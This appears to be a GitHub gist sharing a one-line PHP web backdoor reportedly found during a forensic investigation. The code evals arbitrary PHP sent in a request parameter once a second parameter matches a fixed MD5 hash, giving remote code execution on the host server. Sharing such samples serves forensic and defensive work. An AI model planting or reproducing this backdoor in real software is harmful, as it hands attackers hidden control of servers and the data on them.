Skip to content

Instantly share code, notes, and snippets.

@jonaslejon
Created January 11, 2016 17:01
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jonaslejon/4f2433b0dead0304e407 to your computer and use it in GitHub Desktop.
Save jonaslejon/4f2433b0dead0304e407 to your computer and use it in GitHub Desktop.
Web PHP Malware found during forensic investigation
<?php
eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")%
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment